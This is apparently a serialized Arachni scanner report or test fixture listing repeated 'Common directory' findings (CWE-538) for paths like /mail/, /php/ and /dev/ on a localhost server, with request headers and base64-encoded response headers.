mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/mail/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/mail/ injected: mail id: mail elem: path remarks: {} method: '' response: mail headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/php/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/php/ injected: php id: php elem: path remarks: {} method: '' response: php headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/utils/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/utils/ injected: utils id: utils elem: path remarks: {} method: '' response: utils headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/util/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/util/ injected: util id: util elem: path remarks: {} method: '' response: util headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/dev/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/dev/ injected: dev id: dev elem: path remarks: {} method: '' response: dev headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/jsp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/jsp/ injected: jsp id: jsp elem: path remarks: {} method: '' response: jsp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/devel/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/devel/ injected: devel id: devel elem: path remarks: :stuff: - Blah - Blah2 method: '' response: devel headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/development/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/development/ injected: development id: development elem: path remarks: {} method: '' response: development headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/updates/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/updates/ injected: updates id: updates elem: path remarks: {} method: '' response: updates headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/register/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/register/ injected: register id: register elem: path remarks: {} method: '' response: register headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/search/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/search/ injected: search id: search elem: path remarks: {} method: '' response: search headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/service/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/service/ injected: service id: service elem: path remarks: {} method: '' response: service headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/services/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/services/ injected: services id: services elem: path remarks: {} method: '' response: services headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/report/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/report/ injected: report id: report elem: path remarks: {} method: '' response: report headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/reports/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/reports/ injected: reports id: reports elem: path remarks: {} method: '' response: reports headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/purchase/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/purchase/ injected: purchase id: purchase elem: path remarks: {} method: '' response: purchase headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
